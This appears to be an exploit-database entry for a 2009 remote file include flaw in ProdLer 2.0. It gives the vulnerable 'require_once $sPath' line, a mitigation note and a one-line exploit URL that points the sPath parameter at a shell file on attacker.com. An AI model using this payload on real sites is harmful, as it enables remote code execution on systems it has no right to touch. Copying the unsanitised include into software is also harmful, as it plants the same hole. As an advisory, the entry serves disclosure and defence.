header-logo
Suggest Exploit
vendor:
ProdLer
by:
cr4wl3r
9.3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: ProdLer
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ProdLer <= 2.0 Remote File Include Vulnerability

ProdLer is vulnerable to a remote file include vulnerability. This vulnerability exists due to insufficient sanitization of user-supplied input in the 'sPath' parameter of 'prodler.class.php' script. An attacker can exploit this vulnerability to include arbitrary files from remote locations by using directory traversal techniques. This can potentially allow an attacker to include malicious files from remote locations and execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent directory traversal attacks. All user-supplied input should be validated and filtered for malicious characters.
Source

Exploit-DB raw data:

#######################[In The Name Of Allah]##########################
#ProdLer <= 2.0 Remote File Include Vulnerability
#Download Script      :  http://sourceforge.net/projects/prodler/files/
#Author               :  cr4wl3r 
#Contact              :  cr4wl3r[4t]linuxmail[dot]org 
#Location             :  Gorontalo - INDONESIA
#Blog                 :  http://sh3ll4u.blogspot.com
#Dork                 :  No DoRk f0R ScRipT KiDDieS
########################################################################
#file :
#  prodler.class.php
# line 4 require_once $sPath.'include/variable.class.php';
########################################################################
#3xplo!t :
#http://target.com/[path]/include/prodler.class.php?sPath=http://attacker.com/shell.txt???  
########################################################################
#Greetz          : MyMom [alm]
#Special Thanks  : str0ke, All MusLim HacKers
#Thanks 2        : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral, s4va,
#                  mywisdom, wendys, cyberpeace, agenr@t, basix, nTc, angky.tatoki, funky_sensey, exnome,
#                  aRiee, Romy.Chairul, Mr.C, Mr.Crossbeam, noQen, CyberSufi, untouch, g4pt3k, chawanua,
#                  d3vilnet, donyskaynet, panteto, MaRloN, Dew0
########################################################################
# F0r All MusLim In tHe W0rlD :
# SelaMat IduL FitRi 1 SyaWaL 1430H
# Takabbalallah Huminnawaminkum Minalaidin Walfaizin
########################################################################
#Note : No fuCk, JusT PeaCe
########################################################################
#sekuritionline.net (all crew sekuritionline)
#manadocoding.net (all crew manadocoding)
###########################[VIVA ISLAM]#################################

# milw0rm.com [2009-09-21]